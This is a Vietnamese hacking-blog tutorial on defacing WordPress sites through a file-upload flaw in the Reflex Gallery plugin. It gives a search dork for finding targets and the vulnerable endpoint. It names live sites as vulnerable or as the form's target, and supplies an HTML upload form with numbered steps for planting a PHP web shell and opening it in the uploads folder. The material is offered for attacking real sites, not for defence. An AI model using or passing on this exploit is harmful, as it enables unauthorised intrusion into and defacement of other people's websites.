• Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
AnonyViet
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
No Result
View All Result
AnonyViet
No Result
View All Result

[DEFACE] How To Deface with WordPress Reflex Gallery

AnonyViet by AnonyViet
09/12/2015 - Updated on 20/12/2015
in Deface
0
0
SHARES
Share on FacebookShare on Twitter

——————————————————————–
– Dork : inurl:/wp-content/plugins/reflex-gallery/
– Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
– Vuln : {“error”:”No files were uploaded.”}
– My Site Vuln : http://sjoyster.com/
– Script CSRF :
<html>
<title>Reflex-Gallery CSRF</title>
<form method=”POST” action=”http://straightlineinspection.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php” enctype=”multipart/form-data” >

<input type=”file” name=”qqfile”><br>

Các bài viết liên quan

wordpress là gì

WordPress là gì? Các kiến thức WordPress cơ bản cho người mới bắt đầu

10/11/2019
[DEFACE] How To Deface with WordPress Reflex Gallery 1

Cách sử dụng Plugin Site Kit by Google trên WordPress

03/11/2019
Lỗ hổng bảo mật trên Plugin Live Chat with Facebook Messenger

Lỗ hổng bảo mật trên Plugin Live Chat with Facebook Messenger

29/05/2019
[DEFACE] How To Deface with WordPress Reflex Gallery 2

Miễn phí khóa học thiết kế Web chuẩn SEO với WordPress

01/11/2018 - Updated on 08/11/2019

<input type=”submit” name=”Submit” value=”Pwn!”>

</form>
</html>
———————————————————————-

Okay Lets Go to Tutorial

– Save script CSRF [ reflex.html ] – Change The Site , to site Vuln
– Save
– Chek The Vuln
– Oh yeah , that vuln 😀
– Open The Script in the Browser
– Upload your shell
– bcc.php is my shell 🙂
– Click ” Pwn!”
– Succses 😀
– Open your Shell in the :
[ site.com/wp-content/uploads/shell.php

Xem thêm:  XSS Vulnerability
Tags: DefaceWordPress
Previous Post

[DEFACE] How To Deface with Formcraft

 Next Post

XSS Vulnerability

AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Khai thác lỗ hổng Wordpress Plugin WP-Dreamworkgallery 3
Deface

Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

01/04/2017 - Updated on 03/04/2017
Hướng dẫn khai thác lỗi CMS Upload Website 2017 10
Basic Hacking

Bảo vệ: Hướng dẫn khai thác lỗi CMS Upload Website 2017

11/01/2017 - Updated on 20/07/2018
Khai thác lỗi Fcklinkgallery để Up file 10
Deface

Khai thác lỗi Fcklinkgallery để Up file

08/02/2016
Dork Upload File FCKeditor [Update]
Deface

Dork Upload File FCKeditor [Update]

08/01/2016
Hướng dẫn khai thác lỗi FCK trên Website 6
Deface

Hướng dẫn khai thác lỗi FCK trên Website

07/01/2016
Admin Login Bypass [0day] 1
Deface

Admin Login Bypass [0day]

03/01/2016 - Updated on 04/01/2016
Next Post
XSS Vulnerability

XSS Vulnerability

guest
guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

0 Comments
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Các bài mới

tat thong bao windows

Cách di chuyển hoặc tắt cửa sổ thông báo trên Windows 10

12/07/2020
hoc lap trinh gi tro thanh hacker

TOP 15 ngôn ngữ lập trình cần thiết để trở thành Hacker

11/07/2020
[DEFACE] How To Deface with WordPress Reflex Gallery 3

Facebook đang khiến Spotify, Pinterest, Tinder và nhiều ứng dụng iOS khác bị lỗi

11/07/2020
google chrome password manager

Cách thêm và xuất mật khẩu đã lưu trên trình duyệt Chrome

10/07/2020
so sanh su khac nhau linux va unix

Sự khác nhau giữa Linux và Unix và các những điều bạn chưa biết

10/07/2020

Ads 300×600

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên kết

Liên hệ đặt Ads: anonyviet.com@gmail.com

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

Bài viết mới

  • Cách di chuyển hoặc tắt cửa sổ thông báo trên Windows 10
  • TOP 15 ngôn ngữ lập trình cần thiết để trở thành Hacker
  • Facebook đang khiến Spotify, Pinterest, Tinder và nhiều ứng dụng iOS khác bị lỗi
  • Cách thêm và xuất mật khẩu đã lưu trên trình duyệt Chrome
  • Sự khác nhau giữa Linux và Unix và các những điều bạn chưa biết
  • Cách hiển thị dự báo Thời tiết trên màn hình khóa iPhone
  • Giới thiệu về AnonyViet
  • Liên hệ Quảng cáo
  • Privacy & Policy
  • Contact

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

wpDiscuz